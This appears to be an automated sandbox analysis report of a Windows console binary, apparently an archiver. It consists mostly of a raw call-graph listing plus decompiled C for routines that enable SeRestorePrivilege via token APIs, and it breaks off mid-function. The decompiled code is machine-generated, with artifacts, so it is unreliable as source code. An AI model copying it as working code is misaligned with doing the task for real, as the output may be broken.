44093->44094 44095 3badf1 44094->44095 44096 3b1e40 free 44095->44096 44096->44086 44097->44093 44098 3b809f 44099 3b80a9 __EH_prolog 44098->44099 44100 3b2d47 2 API calls 44099->44100 44101 3b80c3 44100->44101 44102 3b695d 30 API calls 44101->44102 44103 3b80d2 44102->44103 44104 3b80f0 44103->44104 44105 3b80d6 44103->44105 44107 3b8102 44104->44107 44108 3b80f7 44104->44108 44106 3b80e3 SetLastError 44105->44106 44113 3b80fc 44105->44113 44112 3b8100 44106->44112 44132 3b8170 36 API calls 2 library calls 44107->44132 44110 3b5ae6 36 API calls 44108->44110 44110->44113 44134 3b1e40 free 44112->44134 44113->44112 44123 3b81d9 44113->44123 44115 3b8107 44117 3b8121 44115->44117 44118 3b8136 44115->44118 44116 3b8131 44119 3b7322 FindCloseChangeNotification 44117->44119 44120 3b7322 FindCloseChangeNotification 44118->44120 44121 3b8129 44119->44121 44120->44113 44133 3b1e40 free 44121->44133 44124 3b81e3 __EH_prolog 44123->44124 44135 3b78c6 44124->44135 44127 3b8218 DeviceIoControl 44130 3b7322 FindCloseChangeNotification 44127->44130 44128 3b820c 44129 3b7322 FindCloseChangeNotification 44128->44129 44131 3b8214 44129->44131 44130->44131 44131->44112 44132->44115 44133->44116 44134->44116 44136 3b7270 12 API calls 44135->44136 44137 3b78e0 44136->44137 44137->44127 44137->44128 44138 3eb118 44139 3eb361 44138->44139 44142 3e420c SetConsoleCtrlHandler 44139->44142 44141 3eb36d 44142->44141 44143 3c319a 44144 3c31b8 44143->44144 44145 3c31a7 44143->44145 44145->44144 44149 3c31bf 44145->44149 44150 3c31c9 __EH_prolog 44149->44150 44178 3c65ae free ctype 44150->44178 44152 3c31e4 44179 3b1e40 free 44152->44179 44154 3c31ef 44180 3d0a72 free ctype 44154->44180 44156 3c3205 44181 3b1e40 free 44156->44181 44158 3c320c 44182 3b1e40 free 44158->44182 44160 3c3217 44183 3b1e40 free 44160->44183 44162 3c3222 44184 3c6548 free ctype 44162->44184 44164 3c3234 44185 3d0a72 free ctype 44164->44185 44166 3c3257 44186 3b1e40 free 44166->44186 44168 3c328a 44187 3b1e40 free 44168->44187 44170 3c32aa 44188 3c332f free __EH_prolog ctype 44170->44188 44172 3c32ba 44189 3b1e40 free 44172->44189 44174 3c32e4 44190 3b1e40 free 44174->44190 44176 3c31b2 44177 3b1e40 free 44176->44177 44177->44144 44178->44152 44179->44154 44180->44156 44181->44158 44182->44160 44183->44162 44184->44164 44185->44166 44186->44168 44187->44170 44188->44172 44189->44174 44190->44176 44191 3b7a12 SetEndOfFile 44192 3e8754 44271 3ea3cd 44192->44271 44194 3e8761 44277 3c0b45 44194->44277 44196 3e878c 44197 3e87ce GetStdHandle GetConsoleScreenBufferInfo 44196->44197 44198 3e87e5 44196->44198 44197->44198 44199 3b1e0c ctype 2 API calls 44198->44199 44200 3e87f3 44199->44200 44388 3d67b1 44200->44388 44202 3e8840 44272 3ea3d8 fputs 44271->44272 44273 3ea401 44271->44273 44452 3b1fa0 fputc 44272->44452 44273->44194 44275 3ea3f1 44275->44273 44276 3ea3f5 fputs 44275->44276 44276->44273 44278 3c0b7e 44277->44278 44279 3c0b61 44277->44279 44453 3c15fd 44278->44453 44483 3d097c 5 API calls __EH_prolog 44279->44483 44282 3c0b70 _CxxThrowException 44282->44278 44284 3c0bb5 44286 3c0bce 44284->44286 44288 3b4f40 5 API calls 44284->44288 44289 3c0bec 44286->44289 44290 3b2f2f 3 API calls 44286->44290 44287 3c0ba7 _CxxThrowException 44287->44284 44288->44286 44291 3c0c34 wcscmp 44289->44291 44298 3c0c48 44289->44298 44290->44289 44292 3c0cc1 44291->44292 44291->44298 44485 3d097c 5 API calls __EH_prolog 44292->44485 44294 3c0cd0 _CxxThrowException 44294->44298 44295 3c0cbb 44486 3c2538 6 API calls 2 library calls 44295->44486 44297 3c0d06 44487 3c2538 6 API calls 2 library calls 44297->44487 44298->44295 44300 3c0dac 44298->44300 44488 3d097c 5 API calls __EH_prolog 44300->44488 44302 3c0dbb _CxxThrowException 44304 3c0d1a 44302->44304 44303 3c0e91 44458 3c16bb 44303->44458 44304->44303 44305 3c0e57 44304->44305 44489 3d097c 5 API calls __EH_prolog 44304->44489 44308 3b2f2f 3 API calls 44305->44308 44311 3c0e6e 44308->44311 44310 3c0e49 _CxxThrowException 44310->44305 44311->44303 44490 3d097c 5 API calls __EH_prolog 44311->44490 44312 3c0eeb 44314 3c0f14 44312->44314 44315 3b2f2f 3 API calls 44312->44315 44313 3b2f2f 3 API calls 44313->44312 44316 3b4f40 5 API calls 44314->44316 44315->44314 44318 3c0f27 44316->44318 44474 3c245e 44318->44474 44319 3c0e83 _CxxThrowException 44319->44303 44321 3c0f34 44322 3c12d8 44321->44322 44326 3c0fb3 44321->44326 44323 3c14e0 44322->44323 44325 3c1312 44322->44325 44499 3d097c 5 API calls __EH_prolog 44322->44499 44324 3c154c 44323->44324 44336 3c14e7 44323->44336 44328 3c15b7 44324->44328 44329 3c1551 44324->44329 44337 3c2625 5 API calls 44325->44337 44334 3c108c wcscmp 44326->44334 44352 3c10a0 44326->44352 44332 3c15c0 _CxxThrowException 44328->44332 44380 3c125f 44328->44380 44330 3b4e6c 16 API calls 44329->44330 44333 3c155e 44330->44333 44331 3c1304 _CxxThrowException 44331->44325 44506 3b4e21 8 API calls 44333->44506 44339 3c10e1 wcscmp 44334->44339 44334->44352 44335 3b4e6c 16 API calls 44335->44352 44336->44380 44505 3d097c 5 API calls __EH_prolog 44336->44505 44348 3c1334 44337->44348 44340 3c1101 wcscmp 44339->44340 44339->44352 44344 3c1121 44340->44344 44340->44352 44341 3c1565 44345 3b4f40 5 API calls 44341->44345 44493 3d097c 5 API calls __EH_prolog 44344->44493 44345->44380 44346 3c1532 _CxxThrowException 44346->44380 44350 3c13e1 44348->44350 44351 3b2f2f 3 API calls 44348->44351 44349 3c1130 _CxxThrowException 44363 3c113e 44349->44363 44353 3c1492 44350->44353 44357 3c1431 44350->44357 44501 3d097c 5 API calls __EH_prolog 44350->44501 44354 3c13bb 44351->44354 44352->44335 44352->44363 44491 3b4e21 8 API calls 44352->44491 44492 3d097c 5 API calls __EH_prolog 44352->44492 44356 3c14ad 44353->44356 44360 3b2f2f 3 API calls 44353->44360 44354->44350 44500 3b34a6 memmove 44354->44500 44356->44380 44504 3d097c 5 API calls __EH_prolog 44356->44504 44357->44353 44362 3c1459 44357->44362 44502 3d097c 5 API calls __EH_prolog 44357->44502 44359 3c10d3 _CxxThrowException 44359->44339 44360->44356 44361 3c1423 _CxxThrowException 44361->44357 44362->44353 44503 3d097c 5 API calls __EH_prolog 44362->44503 44364 3c11b6 44363->44364 44494 3c1673 malloc _CxxThrowException free memcpy _CxxThrowException 44363->44494 44365 3b4e6c 16 API calls 44364->44365 44370 3c11bf 44365->44370 44495 3d0710 35 API calls 44370->44495 44371 3c14d2 _CxxThrowException 44371->44323 44372 3c144b _CxxThrowException 44372->44362 44375 3c1484 _CxxThrowException 44375->44353 44376 3c11c6 44496 3b4e21 8 API calls 44376->44496 44378 3c11cd 44379 3b2f2f 3 API calls 44378->44379 44382 3c11e8 44378->44382 44379->44382 44380->44196 44381 3c1231 44381->44380 44383 3b2f2f 3 API calls 44381->44383 44382->44380 44382->44381 44497 3d097c 5 API calls __EH_prolog 44382->44497 44386 3c1251 44383->44386 44385 3c1223 _CxxThrowException 44385->44381 44498 3b8274 malloc _CxxThrowException free _CxxThrowException 44386->44498 44389 3d67bb __EH_prolog 44388->44389 44514 3d6b55 44389->44514 44391 3d690d 44391->44202 44392 3b302d malloc _CxxThrowException free 44398 3d67cc 44392->44398 44393 3b2d47 malloc _CxxThrowException 44393->44398 44395 3b1e40 free ctype 44395->44398 44397 3ef23f 5 API calls 44397->44398 44398->44391 44398->44392 44398->44393 44398->44395 44398->44397 44399 3b421f 3 API calls 44398->44399 44401 3d68ca memcpy 44398->44401 44518 3d66a9 44398->44518 44536 3d692c malloc _CxxThrowException free memcpy 44398->44536 44537 3d6154 malloc _CxxThrowException memcpy __EH_prolog ctype 44398->44537 44399->44398 44401->44398 44452->44275 44454 3b2e5f 2 API calls 44453->44454 44455 3c1610 44454->44455 44507 3b1e40 free 44455->44507 44457 3c0b90 44457->44284 44484 3d097c 5 API calls __EH_prolog 44457->44484 44460 3c16c5 __EH_prolog 44458->44460 44459 3c1721 44462 3c0ebf 44459->44462 44465 3c17d8 44459->44465 44471 3c17b1 44459->44471 44510 3c1673 malloc _CxxThrowException free memcpy _CxxThrowException 44459->44510 44460->44459 44461 3b2dcd 2 API calls 44460->44461 44463 3c1706 44461->44463 44462->44312 44462->44313 44508 3c1673 malloc _CxxThrowException free memcpy _CxxThrowException 44463->44508 44512 3d097c 5 API calls __EH_prolog 44465->44512 44466 3c1716 44509 3b1e40 free 44466->44509 44469 3c17e8 _CxxThrowException 44469->44462 44471->44462 44511 3d097c 5 API calls __EH_prolog 44471->44511 44473 3c17ca _CxxThrowException 44473->44465 44480 3c2468 __EH_prolog 44474->44480 44475 3b2d47 malloc _CxxThrowException 44475->44480 44476 3b2f2f 3 API calls 44476->44480 44477 3b2ecb 3 API calls 44477->44480 44478 3ef23f 5 API calls 44478->44480 44480->44475 44480->44476 44480->44477 44480->44478 44481 3b1e40 free ctype 44480->44481 44482 3c2529 44480->44482 44513 3c2772 malloc _CxxThrowException __EH_prolog ctype 44480->44513 44481->44480 44482->44321 44483->44282 44484->44287 44485->44294 44486->44297 44487->44304 44488->44302 44489->44310 44490->44319 44491->44352 44492->44359 44493->44349 44494->44364 44495->44376 44496->44378 44497->44385 44498->44380 44499->44331 44500->44350 44501->44361 44502->44372 44503->44375 44504->44371 44505->44346 44506->44341 44507->44457 44508->44466 44509->44459 44510->44459 44511->44473 44512->44469 44513->44480 44515 3d6b7d 44514->44515 44517 3d6b60 44514->44517 44515->44398 44517->44515 44538 3b1e40 free 44517->44538 44519 3d66b3 __EH_prolog 44518->44519 44536->44398 44537->44398 44538->44517 44563 3dc197 44564 3dc1be 44563->44564 44565 3b92c9 VariantClear 44564->44565 44566 3dc1ff 44565->44566 44567 3dc658 2 API calls 44566->44567 44570 3dc286 44567->44570 44568 3d16ed 2 API calls 44569 3dc321 44568->44569 44571 3b2f2f 3 API calls 44569->44571 44570->44568 44572 3dc369 44571->44572 44573 3dc517 44572->44573 44574 3dc3a2 44572->44574 44577 3b2f2f 3 API calls 44573->44577 44575 3dc5ae 44574->44575 44579 3dc3c6 44574->44579 44638 3b1e40 free 44575->44638 44580 3dc538 44577->44580 44578 3dc5b6 44639 3b1e40 free 44578->44639 44582 3ef23f 5 API calls 44579->44582 44636 3b1e40 free 44580->44636 44584 3dc3ce 44582->44584 44628 3dd128 44584->44628 44585 3dc540 44637 3b1e40 free 44585->44637 44590 3dc3e5 44635 3b1e40 free 44590->44635 44592 3dc07d 44602 3dc460 44592->44602 44609 3dc658 44592->44609 44594 3dc124 44595 3b2f2f 3 API calls 44594->44595 44596 3dc136 44595->44596 44597 3b2f2f 3 API calls 44596->44597 44598 3dc142 44597->44598 44617 3dbeb6 44598->44617 44600 3dc155 44601 3dc15f 44600->44601 44605 3dc43a 44600->44605 44603 3ef23f 5 API calls 44601->44603 44604 3dc167 44603->44604 44606 3dd128 2 API calls 44604->44606 44605->44602 44607 3b2f2f 3 API calls 44605->44607 44608 3dc176 44606->44608 44607->44602 44610 3dc662 __EH_prolog 44609->44610 44611 3b2d47 2 API calls 44610->44611 44612 3dc69b 44611->44612 44613 3b2d47 2 API calls 44612->44613 44614 3dc6a7 44613->44614 44615 3b2d47 2 API calls 44614->44615 44616 3dc6b3 44615->44616 44616->44594 44618 3dbec0 __EH_prolog 44617->44618 44619 3dbf0d 44618->44619 44620 3dbee0 44618->44620 44622 3b1e0c ctype 2 API calls 44619->44622 44623 3dbee7 44619->44623 44621 3b1e0c ctype 2 API calls 44620->44621 44621->44623 44624 3dbf20 44622->44624 44623->44600 44625 3b2f2f 3 API calls 44624->44625 44626 3dbf50 44625->44626 44626->44623 44640 3b7253 GetLastError 44626->44640 44629 3dd132 __EH_prolog 44628->44629 44630 3b1e0c ctype 2 API calls 44629->44630 44631 3dd140 44630->44631 44632 3dc3dd 44631->44632 44641 3dd1c7 malloc _CxxThrowException __EH_prolog 44631->44641 44634 3b1e40 free 44632->44634 44634->44590 44635->44592 44636->44585 44637->44602 44638->44578 44639->44602 44640->44623 44641->44632 44642 41f62d __setusermatherr 44643 41f639 44642->44643 44647 41f6e4 _controlfp 44643->44647 44645 41f63e _initterm __getmainargs _initterm __p___initenv 44646 3eb0ae 44645->44646 44647->44645 44648 3baa96 44649 3baaa5 44648->44649 44651 3baaab 44648->44651 44650 3bfddf 74 API calls 44649->44650 44650->44651 44652 3dbcd0 44653 3dbea1 44652->44653 44654 3dbcd8 44652->44654 44654->44653 44687 3b4489 malloc _CxxThrowException 44654->44687 44656 3dbdb1 44657 3b2d47 2 API calls 44656->44657 44659 3dbdbc 44657->44659 44658 3dbdde 44661 3dbe50 44658->44661 44663 3dbe55 44658->44663 44664 3dbe05 44658->44664 44659->44658 44660 3b2ecb 3 API calls 44659->44660 44660->44658 44695 3b1e40 free 44661->44695 44692 3d6675 CharUpperW 44663->44692 44667 3b2d47 2 API calls 44664->44667 44665 3dbe99 44696 3b1e40 free 44665->44696 44670 3dbe0d 44667->44670 44669 3dbe60 44693 3ce9c5 4 API calls 2 library calls 44669->44693 44671 3b2d47 2 API calls 44670->44671 44673 3dbe1b 44671->44673 44688 3ce9c5 4 API calls 2 library calls 44673->44688 44674 3dbe7c 44676 3b2f2f 3 API calls 44674->44676 44678 3dbe88 44676->44678 44677 3dbe2c 44679 3b2f2f 3 API calls 44677->44679 44694 3b1e40 free 44678->44694 44681 3dbe38 44679->44681 44689 3b1e40 free 44681->44689 44683 3dbe40 44690 3b1e40 free 44683->44690 44685 3dbe48 44691 3b1e40 free 44685->44691 44687->44656 44688->44677 44689->44683 44690->44685 44691->44661 44692->44669 44693->44674 44694->44661 44695->44665 44696->44653 44697 3e9bce 44698 3e9bd8 __EH_prolog 44697->44698 44699 3b2690 2 API calls 44698->44699 44700 3e9c34 44699->44700 44701 3b2d47 2 API calls 44700->44701 44702 3e9c4f 44701->44702 44703 3b2d47 2 API calls 44702->44703 44704 3e9c5b 44703->44704 44705 3b2d47 2 API calls 44704->44705 44706 3e9c7f 44705->44706 44707 3b2d47 2 API calls 44706->44707 44708 3e9cc9 44707->44708 44709 3f7e0e 44710 3f7e1b 44709->44710 44711 3f7e2c 44709->44711 44710->44711 44715 3f7e33 44710->44715 44716 3f7e3d __EH_prolog 44715->44716 44728 3f8fe4 44716->44728 44720 3f7e77 44735 3b1e40 free 44720->44735 44722 3f7e82 44736 3b1e40 free 44722->44736 44724 3f7e8d 44737 3d6019 free __EH_prolog ctype 44724->44737 44726 3f7e26 44727 3b1e40 free 44726->44727 44727->44711 44731 3f8fee __EH_prolog 44728->44731 44729 3f9057 free 44730 3f9020 44729->44730 44738 3f4b1a memset 44730->44738 44731->44729 44733 3f7e6c 44734 3b1e40 free 44733->44734 44734->44720 44735->44722 44736->44724 44737->44726 44738->44733 44739 417070 44740 4170d6 44739->44740 44747 4171c0 ResetEvent CreateEventW GetLastError 44740->44747 44742 41717d 44743 417145 44743->44742 44748 417200 44743->44748 44747->44743 44749 417217 44748->44749 44753 417230 44749->44753 44752 4171e0 WaitForSingleObject GetLastError FindCloseChangeNotification GetLastError 44752->44742 44758 417290 44753->44758 44755 41723d 44757 41716d 44755->44757 44763 416d30 EnterCriticalSection LeaveCriticalSection 44755->44763 44757->44742 44757->44752 44761 4172c5 44758->44761 44760 417c80 20 API calls 44760->44761 44761->44760 44762 417bc6 44761->44762 44764 416c90 EnterCriticalSection LeaveCriticalSection 44761->44764 44762->44755 44763->44757 44764->44761 44765 3f4bc7 44770 3f4be7 44765->44770 44768 3f4bdf 44771 3f4bf1 __EH_prolog 44770->44771 44779 3f500c 44771->44779 44775 3f4c13 44784 3ed414 free ctype 44775->44784 44777 3f4bcf 44777->44768 44778 3b1e40 free 44777->44778 44778->44768 44780 3f5016 __EH_prolog 44779->44780 44785 3b1e40 free 44780->44785 44782 3f4c07 44783 3f4fd0 free ctype 44782->44783 44783->44775 44784->44777 44785->44782 44786 3bbf80 44787 3bbf9e 44786->44787 44788 3bbf8d 44786->44788 44788->44787 44790 3b1e40 free 44788->44790 44790->44787 44791 3e9243 44792 3e924c fputs 44791->44792 44793 3e9260 44791->44793 44937 3b1fa0 fputc 44792->44937 44938 3e421a 44793->44938 44797 3b2d47 2 API calls 44798 3e92b8 44797->44798 44942 3d0461 44798->44942 44800 3e92e0 45002 3b1e40 free 44800->45002 44802 3e92ef 44803 3e9305 44802->44803 44804 3eb5fa ctype 5 API calls 44802->44804 44805 3e9325 44803->44805 45003 3e45b8 44803->45003 44804->44803 44806 3eb561 ctype 5 API calls 44805->44806 44808 3e9334 44806->44808 44811 3b1e0c ctype 2 API calls 44808->44811 44911 3e98ed 44808->44911 44810 3e9a2e 44812 3e9a3a 44810->44812 45040 3d0a72 free ctype 44810->45040 44818 3e9351 44811->44818 44814 3e9a51 44812->44814 44816 3e9a4c 44812->44816 44815 3ea789 _CxxThrowException 44814->44815 44817 3e9a59 44815->44817 45041 3ea7a4 30 API calls __aulldiv 44816->45041 45042 3b1e40 free 44817->45042 44821 3b2f2f 3 API calls 44818->44821 44824 3e939d 44821->44824 44822 3e9a64 45043 3b1e40 free 44822->45043 44826 3ead5a 3 API calls 44824->44826 44825 3e9a94 45044 3b11c2 free __EH_prolog ctype 44825->45044 44828 3e9405 44826->44828 44830 3c2625 5 API calls 44828->44830 44829 3e9aa0 45045 3eac28 free __EH_prolog ctype 44829->45045 44832 3e9445 44830->44832 44835 3b2d47 2 API calls 44832->44835 44833 3e9aaf 45046 3d0a72 free ctype 44833->45046 44837 3e944d 44835->44837 44836 3e9abb 44838 3d2fc1 2 API calls 44837->44838 44839 3e945c 44838->44839 44840 3e948d 44839->44840 45014 3d23c0 15 API calls 2 library calls 44839->45014 44842 3d0d11 150 API calls 44840->44842 44844 3e94e4 44842->44844 44843 3e9486 44845 3ea789 _CxxThrowException 44843->44845 44846 3e94f9 44844->44846 44847 3eb5fa ctype 5 API calls 44844->44847 44845->44840 44848 3e9539 44846->44848 45015 3b1fa0 fputc 44846->45015 44847->44846 44849 3e95b5 44848->44849 45018 3b1fa0 fputc 44848->45018 44850 3e95f0 44849->44850 44853 3e95cb fputs 44849->44853 44855 3e962f 44850->44855 44859 3e960a fputs 44850->44859 44860 3e96b0 44850->44860 44857 3b2201 fputs 44853->44857 44854 3e955a 44854->44849 44858 3e956c fputs 44854->44858 44855->44860 44866 3e9668 44855->44866 44867 3e9644 fputs 44855->44867 44856 3e9511 fputs 45016 3b1fa0 fputc 44856->45016 44862 3e95e9 44857->44862 44863 3b2201 fputs 44858->44863 44864 3b2201 fputs 44859->44864 44882 3e9700 44860->44882 45026 3b1fa0 fputc 44860->45026 45021 3b1fa0 fputc 44862->45021 44870 3e9589 44863->44870 44871 3e9628 44864->44871 44865 3e9527 45017 3b1fa0 fputc 44865->45017 44866->44860 45024 3b1fa0 fputc 44866->45024 44868 3b2201 fputs 44867->44868 44872 3e9661 44868->44872 45019 3b1fa0 fputc 44870->45019 45022 3b1fa0 fputc 44871->45022 45023 3b1fa0 fputc 44872->45023 44879 3e967d 44879->44860 44887 3e968b fputs 44879->44887 44881 3e988a 45034 3b1fa0 fputc 44881->45034 44882->44881 44889 3e973c 44882->44889 44936 3e987b 44882->44936 44883 3e9590 fputs 44884 3e96cd 44884->44882 44886 3e96db fputs 44884->44886 44892 3b2201 fputs 44886->44892 44888 3e98d5 44901 3e9756 fputs 44889->44901 44902 3e977b 44889->44902 44889->44936 44891 3e9891 44891->44936 44908 3b2201 fputs 44901->44908 44903 3e97a6 fputs 44902->44903 44916 3e981d fputs 44902->44916 45039 3d0a72 free ctype 44911->45039 45036 3d302f free ctype 44936->45036 44937->44793 44939 3e4223 44938->44939 44940 3e4230 44938->44940 45047 3b2711 malloc _CxxThrowException free ctype 44939->45047 44940->44797 44943 3d046b __EH_prolog 44942->44943 44944 3cee23 6 API calls 44943->44944 44945 3d0490 44944->44945 44946 3cf237 49 API calls 44945->44946 44947 3d04ad 44946->44947 44948 3d04c2 44947->44948 44963 3d04e4 44947->44963 45048 3d06ae free __EH_prolog ctype 44948->45048 44950 3d053e 45052 3d06ae free __EH_prolog ctype 44950->45052 44951 3d04d0 45049 3d0a72 free ctype 44951->45049 44954 3d054d 44973 3d056f 44954->44973 45053 3d097c 5 API calls __EH_prolog 44954->45053 44956 3d04dc 44956->44800 44958 3ef23f 5 API calls 44958->44963 44959 3d0561 _CxxThrowException 44959->44973 44960 3d05c7 44965 3d6b24 free 44960->44965 44961 3b1524 2 API calls 44961->44963 44962 3b2d47 2 API calls 44962->44973 44963->44950 44963->44958 44963->44961 45050 3ced4d malloc _CxxThrowException free _CxxThrowException 44963->45050 45051 3b1e40 free 44963->45051 44967 3d05ea 44965->44967 44966 3b600a 9 API calls 44966->44973 44968 3eee93 4 API calls 44967->44968 44970 3d05f3 44968->44970 44969 3ef23f 5 API calls 44969->44973 44972 3d6b24 free 44970->44972 44971 3b1524 2 API calls 44971->44973 44974 3d0600 44972->44974 44973->44960 44973->44962 44973->44966 44973->44969 44973->44971 45054 3b1e40 free 44973->45054 44976 3eee93 4 API calls 44974->44976 44983 3d0608 44976->44983 44977 3d0658 45056 3b1e40 free 44977->45056 44978 3b1524 malloc _CxxThrowException 44978->44983 44980 3d0660 45057 3d0a72 free ctype 44980->45057 44982 3d066d 45058 3d0a72 free ctype 44982->45058 44983->44977 44983->44978 44986 3d068c 44983->44986 45055 3b4268 CharUpperW 44983->45055 45059 3d097c 5 API calls __EH_prolog 44986->45059 44988 3d06a0 _CxxThrowException 44989 3d06ae __EH_prolog 44988->44989 45060 3b1e40 free 44989->45060 44991 3d06d1 45061 3ceef1 free ctype 44991->45061 44993 3d06da 45062 3d0aa7 free __EH_prolog ctype 44993->45062 44995 3d06e6 45063 3b1e40 free 44995->45063 44997 3d06ee 45064 3b1e40 free 44997->45064 44999 3d06f6 45065 3d0a72 free ctype 44999->45065 45001 3d0703 45001->44800 45002->44802 45004 3e45c2 __EH_prolog 45003->45004 45005 3e4604 45004->45005 45006 3b2690 2 API calls 45004->45006 45005->44805 45007 3e45d6 45006->45007 45066 3e4435 45007->45066 45011 3e45fc 45081 3b1e40 free 45011->45081 45014->44843 45015->44856 45016->44865 45017->44848 45018->44854 45019->44883 45021->44850 45022->44855 45023->44866 45024->44879 45026->44884 45034->44891 45036->44888 45039->44810 45040->44812 45041->44814 45042->44822 45043->44825 45044->44829 45045->44833 45046->44836 45047->44940 45048->44951 45049->44956 45050->44963 45051->44963 45052->44954 45053->44959 45054->44973 45055->44983 45056->44980 45057->44982 45058->44956 45059->44988 45060->44991 45061->44993 45062->44995 45063->44997 45064->44999 45065->45001 45067 3e446e 45066->45067 45068 3e4446 45066->45068 45082 3e4350 45067->45082 45069 3e4350 5 API calls 45068->45069 45072 3e4462 45069->45072 45074 3b284c 5 API calls 45072->45074 45074->45067 45075 3e44cb fputs 45080 3b1fa0 fputc 45075->45080 45076 3e449d 45076->45075 45077 3e4350 5 API calls 45076->45077 45078 3e44be 45077->45078 45079 3e44ce 5 API calls 45078->45079 45079->45075 45080->45011 45081->45005 45083 3e436a 45082->45083 45084 3b284c 5 API calls 45083->45084 45085 3e4375 45084->45085 45086 3b284c 5 API calls 45085->45086 45087 3e4384 45086->45087 45088 3e44ce 45087->45088 45089 3e44de 45088->45089 45090 3e44f7 45088->45090 45091 3b284c 5 API calls 45089->45091 45090->45076 45092 3e44e8 45091->45092 45094 3e438a malloc _CxxThrowException free memcpy _CxxThrowException 45092->45094 45094->45090

                                                                                                    Executed Functions

                                                                                                    Function 003B8FE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1028 3b8fe9-3b900e GetCurrentProcess OpenProcessToken 1029 3b9010-3b9020 LookupPrivilegeValueW 1028->1029 1030 3b9066 1028->1030 1031 3b9058 1029->1031 1032 3b9022-3b9046 AdjustTokenPrivileges 1029->1032 1033 3b9069-3b906e 1030->1033 1035 3b905b-3b9064 FindCloseChangeNotification 1031->1035 1032->1031 1034 3b9048-3b9056 GetLastError 1032->1034 1034->1035 1035->1033
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E003B8FE9(WCHAR* __ecx, signed char __edx) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t17;
				int _t20;
				signed int _t21;
				signed char _t22;
				signed char _t23;
				WCHAR* _t30;

				_v5 = _v5 & 0x00000000;
				_t22 = __edx;
				_t30 = __ecx;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v12) == 0) {
					_t23 = _v5;
				} else {
					_t17 = LookupPrivilegeValueW(0, _t30,  &(_v28.Privileges)); // executed
					if(_t17 == 0) {
						L4:
						_t23 = _v5;
					} else {
						_v28.PrivilegeCount = 1;
						asm("sbb ebx, ebx");
						_v16 =  ~_t22 & 0x00000002;
						_t20 = AdjustTokenPrivileges(_v12, 0,  &_v28, 0, 0, 0); // executed
						if(_t20 == 0) {
							goto L4;
						} else {
							_t21 = GetLastError();
							asm("sbb bl, bl");
							_t23 =  ~_t21 + 1;
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				return _t23;
			}













                                                                                                    0x003b8fef
                                                                                                    0x003b8ff9
                                                                                                    0x003b8ffb
                                                                                                    0x003b900e
                                                                                                    0x003b9066
                                                                                                    0x003b9010
                                                                                                    0x003b9018
                                                                                                    0x003b9020
                                                                                                    0x003b9058
                                                                                                    0x003b9058
                                                                                                    0x003b9022
                                                                                                    0x003b902f
                                                                                                    0x003b9036
                                                                                                    0x003b903b
                                                                                                    0x003b903e
                                                                                                    0x003b9046
                                                                                                    0x00000000
                                                                                                    0x003b9048
                                                                                                    0x003b9048
                                                                                                    0x003b9052
                                                                                                    0x003b9054
                                                                                                    0x003b9054
                                                                                                    0x003b9046
                                                                                                    0x003b905e
                                                                                                    0x003b905e
                                                                                                    0x003b906e

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000020,003C0AD7,?,7776A750,?,?,?,?,003C0AD7,003C0901), ref: 003B8FFF
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,003C0AD7,003C0901), ref: 003B9006
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 003B9018
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(003C0AD7,00000000,?,00000000,00000000,00000000), ref: 003B903E
                                                                                                    • GetLastError.KERNEL32 ref: 003B9048
                                                                                                    • FindCloseChangeNotification.KERNELBASE(003C0AD7,?,?,?,?,003C0AD7,003C0901), ref: 003B905E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationOpenPrivilegePrivilegesValue
                                                                                                    • String ID: SeRestorePrivilege
                                                                                                    • API String ID: 2838110999-1684392131
                                                                                                    • Opcode ID: dfb58f97910634a04183857715a1262a7030cdc6f742ae8f505c77635c01d504
                                                                                                    • Instruction ID: ae016ccb08a2ca09b13e9faac12b7f602e3ffd3ae4f9a96cb2061b7de3dc1b2c
                                                                                                    • Opcode Fuzzy Hash: dfb58f97910634a04183857715a1262a7030cdc6f742ae8f505c77635c01d504
                                                                                                    • Instruction Fuzzy Hash: 60018075A45218AFCB216FF19C89BEF7F7CEF06704F040065EA42E2150D6758A4AD7A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C2962 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1036 3c2962-3c2998 call 41f1b0 GetCurrentProcess call 3c2a00 OpenProcessToken 1041 3c29df-3c29fa call 3c2a00 1036->1041 1042 3c299a-3c29ba LookupPrivilegeValueW 1036->1042 1042->1041 1043 3c29bc-3c29cf AdjustTokenPrivileges 1042->1043 1043->1041 1045 3c29d1-3c29dd GetLastError 1043->1045 1045->1041
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E003C2962(void* __eflags) {
				void* _t16;
				int _t23;
				int _t25;
				signed int _t26;
				int _t28;
				void* _t38;

				E0041F1B0(0x42382c, _t38);
				_t28 = 0;
				 *(_t38 - 0x10) = 0;
				 *(_t38 - 4) = 0;
				_t16 = GetCurrentProcess();
				E003C2A00(_t38 - 0x10);
				if(OpenProcessToken(_t16, 0x28, _t38 - 0x10) != 0) {
